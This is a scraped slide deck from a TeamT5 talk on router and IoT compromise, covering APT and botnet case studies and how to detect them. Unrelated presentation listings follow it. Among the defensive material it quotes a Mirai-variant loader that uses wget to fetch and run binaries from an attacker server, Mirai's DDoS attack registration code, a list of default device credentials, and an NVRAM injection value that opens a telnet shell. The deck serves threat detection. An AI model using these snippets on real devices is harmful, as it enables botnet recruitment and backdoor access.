l a s t e x p l o i t a t i o n
play

L A S T E X P L O I T A T I O N cp / zet / f9a About Us - PowerPoint PPT Presentation

Feb 09, 2024 •258 likes •1.07k views

L A S T E X P L O I T A T I O N cp / zet / f9a About Us Researchers from TeamT5 Core Developer of ThreatSonar for Linux, macOS, Windows We mainly focus on state of the art techniques of threat actors and how to effectively

  1. L A S T E X P L O I T A T I O N cp / zet / f9a

  2. About Us ● Researchers from TeamT5 ● Core Developer of ThreatSonar for Linux, macOS, Windows ● We mainly focus on state of the art techniques of threat actors and how to effectively identify them 3

  3. Attack ● APT and Botnet Case Studies ● Post-Exploitation Techniques Outline Defense ● Identifying Threats ● SOHO Router Vendors Security Solution Tool ● LEAYA: an Embedded System Detection and Response 4

  4. APT and Botnet Case Studies 5

  5. APT APT BlackTech ● Use VPN & DDNS & Virutal Host as C2 server ● Use man-in-the-middle attack subnetwork endpoint 6 https://www.welivesecurity.com/2019/05/14/plead-malware-mitm-asus-webstorage/

  6. APT APT Router Compromise Compromise Attater Router Tartget PC 7 https://www.welivesecurity.com/2019/05/14/plead-malware-mitm-asus-webstorage/

  7. APT APT Update Interception Update request Interception Update Server User Malicious Update Malicious File 8 https://www.welivesecurity.com/2019/05/14/plead-malware-mitm-asus-webstorage/

  8. APT APT Payload Delivery Compromise Malicious Update Malicious Router Update File 9 https://www.welivesecurity.com/2019/05/14/plead-malware-mitm-asus-webstorage/

  9. Slingshot ● Compromised Mikrotik router ● Downloads and loads malicious DLLs when use Winbox connect to router Winbox 10

  10. APT APT Slingshot User Winbox Mikrotik Router https://www.kaspersky.com/about/press-releases/2018_slingshot 11

  11. APT APT Slingshot User Winbox Mikrotik Router https://www.kaspersky.com/about/press-releases/2018_slingshot 12

  12. APT APT Slingshot User Winbox Mikrotik Router https://www.kaspersky.com/about/press-releases/2018_slingshot 13

  13. APT APT Slingshot User Winbox Mikrotik Router https://www.kaspersky.com/about/press-releases/2018_slingshot 14

  14. APT APT Fancy Bear & VPNFilter (APT28) ● VPNFilter use default Cert or 1day to exploit device ● Infecting 500k devices. ● Modules ○ htpx: Http Sniffer ○ ndbr: SSH utility ○ nm: arp/wireless scan ○ netfilter: DoS utility ○ portforwarding ○ socks5proxy ○ tcpvpn: reverse-tcp vpn https://blog.talosintelligence.com/2018/05/VPNFilter.html 15

  15. https://blog.talosintelligence.com/2018/05/VPNFilter.html 16

  16. https://blog.talosintelligence.com/2018/05/VPNFilter.html 17

  17. APT APT VPNFilter Stage 1 ● After exploited router ○ Comproising NVRAM to add itself to crontab in NVRAM ○ Stage 1 will autorun after router reboot NVRAM crontab Stage 1 18

  18. APT APT VPNFilter Stage 1 ● After exploited router ○ Comproising NVRAM to add itself to crontab in NVRAM ○ Stage 1 will autorun after router reboot Stage 2 C2 NVRAM crontab Stage 1 19

  19. 20

  20. Botnet Bo Mirai ● Worm Propagation ● Target: IoT Devices ● Use default username and password ● DDoS ● Open Source ○ Easy to create variants of Miria ■ miori ■ Omni ■ Satori ■ TheMoon 21

  21. BOOL attack_init(void) { int i; add_attack(ATK_VEC_UDP, (ATTACK_FUNC)attack_udp_generic); add_attack(ATK_VEC_VSE, (ATTACK_FUNC)attack_udp_vse); add_attack(ATK_VEC_DNS, (ATTACK_FUNC)attack_udp_dns); add_attack(ATK_VEC_UDP_PLAIN, (ATTACK_FUNC)attack_udp_plain); add_attack(ATK_VEC_SYN, (ATTACK_FUNC)attack_tcp_syn); add_attack(ATK_VEC_ACK, (ATTACK_FUNC)attack_tcp_ack); add_attack(ATK_VEC_STOMP, (ATTACK_FUNC)attack_tcp_stomp); add_attack(ATK_VEC_GREIP, (ATTACK_FUNC)attack_gre_ip); add_attack(ATK_VEC_GREETH, (ATTACK_FUNC)attack_gre_eth); //add_attack(ATK_VEC_PROXY, (ATTACK_FUNC)attack_app_proxy); add_attack(ATK_VEC_HTTP, (ATTACK_FUNC)attack_app_http); return TRUE; } https://github.com/jgamblin/Mirai-Source-Code 22

  22. binarys = "mips mpsl arm arm5 arm6 arm7 sh4 ppc x86 arc" server_ip = "$SERVER_IP" binname = "miori" execname = "$EXECNAME" for arch in $binarys do cd /tmp wget http://$server_ip/$binname.$arch - O $execname chmod 777 $execname ./$execname Think.PHP rm -rf $execname done 23

  23. Default CVE-2018-20062 Username / Password Default CVE-2018-20062 Username / Password Default CVE-2018-20062 Username / Password 24

  24. Bo Botnet LiquorBot ● Base on Mirai ● Worm Propagation ● 82 Default username / password ● Use 12 router exploits ○ Weblogic, WordPress, Drupal ● XMR Miner https://labs.bitdefender.com/2020/01/hold-my-beer-mirai-spinoff-named-liquorbot-incorporates-cryptomining/ 25

  25. Bo Botnet Cereals ● Worm Propagation ● D-Link NVRs and NAS ● 1 Exploit: CVE-2014-2691 ● Install Services ○ VPN (Tinc) ○ HTTP proxy (Polipo) ○ Socks proxy (Nylon) ○ SSH daemon (Dropbear) ○ new root / remote user ● Goal: Download Anime https://www.forcepoint.com/blog/x-labs/botnets-nas-nvr-devices 26

  26. Post-Exploitation Techniques Understanding Threats

  27. Common APT Botnet ● ● ● Persistence DNS Hijacking Worm ● ● ● Weak password Reverse Shell DDoS ● ● ● Hardcoded SSH Reverse-TCP VPN Coin Miner ● ● Service(ssh, telnet, Port Forwarding ● ddns, vpn client, Sniffer ● ddns , proxy) DoS ● ● C&C Compromised DLL 28

  28. Control Network Intention ● ● ● HTTP Proxy Weak password C&C ● ● ● SOCKS Hardcoded SSH Worm ● ● ● Port Forwarding SSH DDoS ● ● ● Reverse Shell TELNET Coin Miner ● ● ● Reverse-TCP VPN DDNS DNS Hijacking ● ● VPN Fake Binary ● Sniffer 29

  29. Conclusion of Attack Router Interface cgi binary (root privileges) Manage Web UPNP Telnet service CMD Buffer Weak XSS injection Overflow password NVRAM 30

  30. Identify Threats 31

  31. Forensic Evidences ● Process ○ Memory ○ Environment ● File ○ /etc/shadow ○ Hardcoded password ○ Autoruns (crontab) ○ NVRAM ○ logs ● Network 32

  32. Pr Proc ocess Detection Artificial Operator (ENV) ● SSH_CLIENT=192.168.7.199 50589 22 TMOUT=0 USER=admin ● ENV=/etc/profile OLDPWD=/tmp/home/root ● HOME=/root TZ=GMT-8 SSH_TTY=/dev/pts/0 ● OLDPWD=/home PS1=\u@\h:\w\$ LOGNAME=admin TERM=xterm-256color PATH=/bin:/usr/bin:/sbin:/usr/sbin:/home/adm in:/mmc/sbin:/mmc/bin:/mmc/usr/sbin:/mmc/usr /bin:/opt/sbin:/opt/bin:/opt/usr/sbin:/opt/u sr/bin SHELL=/bin/sh PWD=/tmp SSH_CONNECTION=192.168.7.199 50589 192.168.7.253 33

  33. Proc Pr ocess Detection Suspicious Process parent process ? Unexpected Process ? ● ● sshd SSH ○ ● dropbear (ssh) TELNET ● web serverice ● DDNS ○ httpd ● VPN ○ lighttpd 34

  34. File Detection on Hardcoded key ● Telnet password openssl zlib -e %s | openssl ● -e %s Certifcate openssl ● AES Key -d %s %s | openssl zlib -d -e %s %s -d %s %s -in %q -k %q -kfile /etc/secretkey 2EB38F7EC41D4B8E1422805BCD5F740BC3B95BE163 E39D67579EB344427F7836 360028C9064242F81074F4C127D299F6 -iv crypt_used_openssl enc_file 35

  35. File Detection on root xc3511 Weak Password root vizxv root admin admin admin root 888888 check your self by dictionary attack root xmhdipc root default root juantech ● /usr/share/wordlist root 123456 root 54321 ● /usr/share/wfuzz/wordlist support support ● /usr/share/golismero/wordlist root (none) admin password ● /usr/share/dirb/wordlist root root root 12345 user user admin (none) root pass admin admin1234 root 1111 admin smcadmin admin 1111 root 666666 36

  36. File Detection on Persistence Attacker can re-package the firmware with several malware ● /etc/rc.d/ ● /etc/init.d/malware ● crontab ● nvram 37

  37. File Detection on NVRAM NVRAM ● NVRAM / Flash ○ /dev/nvram ○ /proc/mtd Boot Loader ○ /dev/mtd* Firmware kernel mtd0: 0x00000000-0x00400000 : "ALL" mtd1: 0x00000000-0x00030000 : "Bootloader" File System mtd2: 0x00030000-0x00040000 : "Config" mtd3: 0x00040000-0x00050000 : "Factory" mtd4: 0x00050000-0x00360000 : "Kernel" MTD Partition mtd5: 0x00360000-0x003b0000 : "DATA" /proc/mtd 38

  38. File Detection on Read NVRAM NVRAM url_filter_rule=rule_1,www.google.com mac_filter_enable=1 mac_filter_max_num=24 Boot Loader mac_filter_mode=deny mac_filter_rule= Firmware kernel mac_ipv6_filter_enable=1 telnetEnabled=0 WscCusPBCEnable=1 File System WscCusPINEnable=0 CusChannel=0 MTD Partition factory_mode=2 /dev/mtd2 39

  39. File Detection on Payload in NVRAM NVRAM url_filter_rule=rule_1,www.google.com$(telnet d -l sh -p 1337 -b 0.0.0.0), mac_filter_enable=1 Boot Loader mac_filter_max_num=24 mac_filter_mode=deny Firmware kernel mac_filter_rule= mac_ipv6_filter_enable=1 telnetEnabled=0 File System WscCusPBCEnable=1 WscCusPINEnable=0 MTD Partition CusChannel=0 factory_mode=2 /dev/mtd2 40

  40. File Detection on Othres ● Fake Binary ○ Diff with firmware ○ File Modification Date ● logs ○ system logs - /jffs/syslog.log 41

  41. Ne Network rk Detection on DNS Hijacking dnsmasq DHCP option resolve.conf /etc/resolv.conf nameserver 192.168.7.1 nameserver 192.168.7.254 42

  42. Ne Network rk Detection on Sniffer ● One of inode exist /proc/net/packet probably is Sniffer (SOCKS_RAW) 43

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

IoDDoS The Internet of Distributed Denial of Service Attacks A Case Study of the Mirai

IoDDoS The Internet of Distributed Denial of Service Attacks A Case Study of the Mirai

SPAWAR S YSTEMS C ENTER P ACIFIC IoDDoS The Internet of Distributed Denial of Service Attacks A Case Study of the Mirai Malware and IoT-Based Botnets 24-26 April, 2017 Presented at the 2 nd International Conference Presented by Roger

654 views • 20 slides
Machine learning from a complexity point of view Artemy Kolchinsky SFI CSSS 2019 1

Machine learning from a complexity point of view Artemy Kolchinsky SFI CSSS 2019 1

Machine learning from a complexity point of view Artemy Kolchinsky SFI CSSS 2019 1 PART I: Overview PART II: Deep nets deep dive What is machine learning? Why do deep nets work so well? Learning in deep nets, in the What are

997 views • 77 slides
Commercial Detection in Heterogeneous Video Streams Using Fused Multi-Modal and Temporal Features

Commercial Detection in Heterogeneous Video Streams Using Fused Multi-Modal and Temporal Features

Commercial Detection in Heterogeneous Video Streams Using Fused Multi-Modal and Temporal Features Masami Mizutani Fujitsu Labs. LTD. Shahram Ebadollahi Columbia University Shih-Fu Chang Columbia University IEEE ICASSP 2005 Philadelphia

638 views • 21 slides
Language-based Colorization of Scene Sketches Changqing Zou* 1,2 , Haoran Mo* 1 , Chengying Gao 1 ,

Language-based Colorization of Scene Sketches Changqing Zou* 1,2 , Haoran Mo* 1 , Chengying Gao 1 ,

Language-based Colorization of Scene Sketches Changqing Zou* 1,2 , Haoran Mo* 1 , Chengying Gao 1 , Ruofei Du 3 , Hongbo Fu 4 Sun Yat-sen University 1 Huawei Noahs Ark Lab 2 Google 3 City University of Hong Kong 4 Nov. 20 th , 2019

1.52k views • 62 slides
Fanfiction, Canon, and Possible Worlds, Or, Why Academics Should Care About Fanfiction Dr. Sara

Fanfiction, Canon, and Possible Worlds, Or, Why Academics Should Care About Fanfiction Dr. Sara

Fanfiction, Canon, and Possible Worlds, Or, Why Academics Should Care About Fanfiction Dr. Sara L. Uckelman Durham University s.l.uckelman@durham.ac.uk @SaraLUckelman 21 October 2019 Dr. Sara L. Uckelman Fanfiction, Canon, and Possible

617 views • 30 slides
Latent Variable Models for Text, Event, and Network Data MURI Project: University of California,

Latent Variable Models for Text, Event, and Network Data MURI Project: University of California,

Latent Variable Models for Text, Event, and Network Data MURI Project: University of California, Irvine Annual Review Meeting December 8 th 2009 Padhraic Smyth (joint work with Arthur Asuncion and Chris DuBois) Event, Text, Network Data

641 views • 40 slides
Applications of R Shiny to Explore, Evaluate and Improve Total Survey Quality Xiaodan Lyu

Applications of R Shiny to Explore, Evaluate and Improve Total Survey Quality Xiaodan Lyu

Applications of R Shiny to Explore, Evaluate and Improve Total Survey Quality Xiaodan Lyu Center for Survey Statistics & Methodology Joint work with Heike Hofmann, Emily Berg, Jie Li Introduction Focus on non-sampling errors Sources: data

364 views • 21 slides
Blood Pressure Management: An Improvement Story Annie Sy, PharmD, MHSA Director, SMF Integrated

Blood Pressure Management: An Improvement Story Annie Sy, PharmD, MHSA Director, SMF Integrated

Blood Pressure Management: An Improvement Story Annie Sy, PharmD, MHSA Director, SMF Integrated Quality Services Capital Region Right Care Initiative University of Best Practices Meeting October 8, 2018 Sutter Medical Foundation Theresa Frei

552 views • 10 slides
Benchmarking and Evaluation in Inverse Reinforcement Learning Peter Henderson Workshop on New

Benchmarking and Evaluation in Inverse Reinforcement Learning Peter Henderson Workshop on New

Benchmarking and Evaluation in Inverse Reinforcement Learning Peter Henderson Workshop on New Benchmarks, Metrics, and Competitions for Robotic Learning RSS 2018 Where do you see the shortcomings in existing benchmarks and evaluation metrics ?

722 views • 24 slides
YOUR SUCCESS | Welcoming Visitors to the Farm Annie Baggett, Agritourism Marketing Specialist

YOUR SUCCESS | Welcoming Visitors to the Farm Annie Baggett, Agritourism Marketing Specialist

YOUR SUCCESS | Welcoming Visitors to the Farm Annie Baggett, Agritourism Marketing Specialist 919.707.3120 | annie.baggett@ncagr.gov NORTH CAROLINA DEPARTMENT OF AGRICULTURE & CONSUMER SERVICES Steve Troxler, Commissioner of Agriculture

720 views • 70 slides
Incrementalization Across Object Abstraction Y. Annie Liu Computer Science Department State

Incrementalization Across Object Abstraction Y. Annie Liu Computer Science Department State

Incrementalization Across Object Abstraction Y. Annie Liu Computer Science Department State University of New York at Stony Brook joint work with Scott Stoller, Michael Gorbovitski, Tom Rothamel, and Ellen Liu 1 Object abstraction

420 views • 27 slides
Whilst you are learning at home, each time we set you Maths tasks we will include a warm up,

Whilst you are learning at home, each time we set you Maths tasks we will include a warm up,

Whilst you are learning at home, each time we set you Maths tasks we will include a warm up, which asks you to reflect on previous topics we have learnt about this year so far. There are four questions on each slide, and then the answers

740 views • 43 slides
Growing Lifelong Philanthropists AUDIO PROBLEMS? LISTEN ON YOUR PHONE : +1 (929) 205-6099|

Growing Lifelong Philanthropists AUDIO PROBLEMS? LISTEN ON YOUR PHONE : +1 (929) 205-6099|

Growing Lifelong Philanthropists AUDIO PROBLEMS? LISTEN ON YOUR PHONE : +1 (929) 205-6099| WEBINAR ID: 282 920 427 12/03/2019 JILL GORDON Director of Learning Indiana Philanthropy Alliance jgordon@inphilanthropy.org Before We Get Started

1.08k views • 30 slides
Large graphs and symmetric sums of squares Annie Raymond joint with Greg Blekherman, Mohit Singh

Large graphs and symmetric sums of squares Annie Raymond joint with Greg Blekherman, Mohit Singh

Large graphs and symmetric sums of squares Annie Raymond joint with Greg Blekherman, Mohit Singh and Rekha Thomas University of Massachusetts, Amherst October 18, 2018 An example Theorem (Mantel, 1907) The maximum number of edges in a graph

1.11k views • 64 slides
2018 CDFI INSTITUTE Renaissance-Conference #CDFIsInvest WiFi Code: CDFI2018 2018 CDFI

2018 CDFI INSTITUTE Renaissance-Conference #CDFIsInvest WiFi Code: CDFI2018 2018 CDFI

WiFi Network: Tweet using 2018 CDFI INSTITUTE Renaissance-Conference #CDFIsInvest WiFi Code: CDFI2018 2018 CDFI Coalition Institute CDFI Fund Director Annie Donovan February 28, 2018 Community Development Financial Institutions Fund

501 views • 12 slides
The role of veridicality and factivity in clause selection Aaron Steven White 1 Kyle Rawlins 2 27

The role of veridicality and factivity in clause selection Aaron Steven White 1 Kyle Rawlins 2 27

NELS 48 University of Iceland 1 University of Rochester, Department of Linguistics Institute for Data Science 2 Johns Hopkins University, Department of Cognitive Science 1 The role of veridicality and factivity in clause selection Aaron Steven

1.6k views • 149 slides
Fixedmobile Convergence: Structural convergence Fronthaul Dirk Breuer Deutsche Telekom

Fixedmobile Convergence: Structural convergence Fronthaul Dirk Breuer Deutsche Telekom

Fixedmobile Convergence: Structural convergence Fronthaul Dirk Breuer Deutsche Telekom Laboratories, Germany Tibor Cinkler Budapest University of Technology and Economics, Hungary Stphane Gosselin Orange R&D, France Annie Gravey

157 views • 5 slides
Announc nouncem ements Homework 1 Grade released Have 1-week rebuttal period

Announc nouncem ements Homework 1 Grade released Have 1-week rebuttal period

Announc nouncem ements Homework 1 Grade released Have 1-week rebuttal period Submit re-grade request via GradeScope 1 Lecture 10 Protocols (Continued) Chapters 9 and 11 in KPS [lecture slides are adapted from previous

780 views • 19 slides
Lecture 11 Protocols (Continued) Chapters 9 and 11 in KPS 1 Key Distribution Center (KDC) or

Lecture 11 Protocols (Continued) Chapters 9 and 11 in KPS 1 Key Distribution Center (KDC) or

Lecture 11 Protocols (Continued) Chapters 9 and 11 in KPS 1 Key Distribution Center (KDC) or Trusted Third Party (TTP) K(X) = Encryption of X with key K KDC generates fresh K Alice Bob obtains K and Obtains knows to use as a K Msg3: K B

455 views • 13 slides
01: Introduction Please read the class syllabus, policies, and lecture schedule; ask if you

01: Introduction Please read the class syllabus, policies, and lecture schedule; ask if you

Welcome to CS411 Web site: CS411 http://www.cs.illinois.edu/class/cs411 Database Systems Announcements, syllabus, policies, schedule, lectures 01: Introduction Please read the class syllabus, policies, and lecture schedule; ask if

232 views • 9 slides
Introduction Multimedia Information Systems 2 VU (707.025) (Web -based Visual Data Analysis

Introduction Multimedia Information Systems 2 VU (707.025) (Web -based Visual Data Analysis

Introduction Multimedia Information Systems 2 VU (707.025) (Web -based Visual Data Analysis in the future) SS 2016 Vedran Sabol Know-Center March 8 th 2016 March 8 th , 2016 MMIS2 VU - Introduction Vedran Sabol Overview

448 views • 31 slides
Text Visualization Ma Maneesh Agrawala CS 448B: Visualization Winter 2020 1 Announcements 2

Text Visualization Ma Maneesh Agrawala CS 448B: Visualization Winter 2020 1 Announcements 2

Text Visualization Ma Maneesh Agrawala CS 448B: Visualization Winter 2020 1 Announcements 2 1 Final project New visualization research or data analysis project I Research : Pose problem, Implement creative solution I Data analysis :

710 views • 45 slides
Outline Fundamental concepts Name space Description expressions Parallel and Distributed

Outline Fundamental concepts Name space Description expressions Parallel and Distributed

Outline Fundamental concepts Name space Description expressions Parallel and Distributed Interest expressions Simulation Static Data Distribution: HLA Declaration Management Class-based filtering PDES: Distributed Virtual

222 views • 4 slides
Spatial Data Structures Spatial Data Structures Hierarchical Bounding Volumes Hierarchical

Spatial Data Structures Spatial Data Structures Hierarchical Bounding Volumes Hierarchical

Spatial Data Structures Spatial Data Structures Hierarchical Bounding Volumes Hierarchical Bounding Volumes Regular Grids Regular Grids Octrees Octrees BSP Trees BSP Trees Constructive Solid Geometry (CSG) Constructive Solid Geometry

519 views • 18 slides

More recommend